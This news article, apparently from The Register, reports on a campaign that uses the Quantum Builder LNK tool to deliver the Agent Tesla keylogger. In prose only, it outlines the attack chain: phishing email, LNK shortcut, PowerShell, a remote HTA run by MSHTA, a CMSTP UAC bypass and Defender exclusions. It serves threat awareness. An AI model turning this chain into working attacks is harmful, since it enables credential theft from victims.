A tool sold on the dark web that allows cybercriminals to create malicious shortcuts to distribute malware is being used in a campaign promoting a long-standing .NET keylogger and remote access Trojan (RAT) called Agent Tesla.
The customizable tool Quantum Builder (aka Quantum LNK Builder) was seen for sale on cybercriminal markets in June by security researchers using Cyware. Attackers can use Quantum Builder to create malicious Microsoft Windows LNK shortcuts.
The shortcuts allow cyber criminals to create and distribute malicious payloads using legitimate system tools such as PowerShell and Microsoft HTML Application (HTA) files.
in one report This week, researchers uncovered a campaign that uses Quantum Builder for delivery Agent TeslaMalware that has been around since 2014 and was used to steal sensitive information from a victim’s device, including user credentials, browser credentials, keystrokes, and clipboard data.
Quantum Builder has been linked to the Advanced Persistent Threat (APT) gang Lazarus Group based on shared Tactics, Techniques and Procedures (TTPs) and source code overlap, but they cannot confidently attribute the current campaign to Lazarus or any specific threat group .
Malware as a Service is cheaper than you think
Quantum Builder, which Cyware says costs about $200 for two-month access up to $950 for lifetime access, can generate LNK, HTA, and ISO payloads that include sophisticated download techniques, and deliver the final payload via a multi-stage attack chain.
This includes decrypting in-memory PowerShell scripts using HTA file to bypass User Account Control (UAC) via Microsoft Connection Manager Profile Installer (CMSTP) – a program to install Connection Manager service profiles – to Agent Start Tesla with administrator rights.
UAC Bypass is also used to run Windows Defenders exclusions on the system.
Quantum Builder has other techniques to evade detection and cloaking tactics, including using living-off-the-land binaries (LOLBins), which are legitimate Microsoft tools. It “also includes techniques such as decoys, UAC prompts, and in-memory PowerShell to run the final payload,” the researchers noted, adding that “these techniques are regularly updated by the Quantum Builder developers.”
The chain of infection begins with a spearphishing email, the subject of which is an order confirmation from GuangDong Nanz Technology, a Chinese manufacturing company. The email contains the LNK file bundled as a GZIP archive which, once executed by the victim, activates the embedded PowerShell codes that launch MSHTA, which then executes the HTA file hosted on a remote server.
“The HTA file then decrypts a PowerShell load script, which decrypts and loads another PowerShell script after performing an AES decryption and GZIP decompression,” they wrote. “The decrypted PowerShell script is the Downloader PS script, which first downloads the Agent Tesla binary from a remote server and then runs it with administrative privileges by performing a UAC bypass using the CMSTP.”
Agent Tesla is then run on the victim’s computer with administrator privileges.
ThreatLabz analysts found multiple samples using different infection chains to deliver Agent Tesla, with the LNK file bundled in a ZIP archive. In this situation, the LNK file also executes the HTA file hosted on the remote server by decoding a command by converting the integers in the command to characters and replacing spaces. It also uses MSHTA to run the HTA file from a remote URL.
In their June report, the Cyware team said attackers found advantages when using LNK extensions. By default, Windows hides the LNK extension. So if a file has an .lnk extension, the user will only see the file name and the .txt extension. Because of this, there is a high possibility of tricking users into clicking on this type of file, they wrote.
In addition, “when the LNK files are executed, they can execute PowerShell code that can be used for further actions,” the Cyware researchers wrote. “In this particular case, it runs an HTML application file hosted on Quantum’s website and uses a legitimate Windows utility used to run HTA files, MSHTA.”
Quantum Builder has been used by threat groups in a number of campaigns to deliver a number of malware families, including RedLine Stealer (which, like Agent Tesla, steals login credentials as well as credit card information and other data), IcedID (banking trojan), GuLoader (advanced downloader) and Remcos RAT and AsyncRAT.
“Threat actors are constantly evolving their tactics and using malware builders sold on the cybercrime marketplace,” they wrote. “This Agent Tesla campaign is the latest in a series of attacks that have used Quantum Builder to create malicious payloads in campaigns against various organizations.”
The campaign “incorporates sophisticated techniques to avoid detection, and the techniques will be updated regularly by the developers,” they added. ®
https://www.theregister.com/2022/09/28/quantum_builder_agent_tesla_rat/ Quantum Builder tool helps criminals distribute Windows RATs • The Register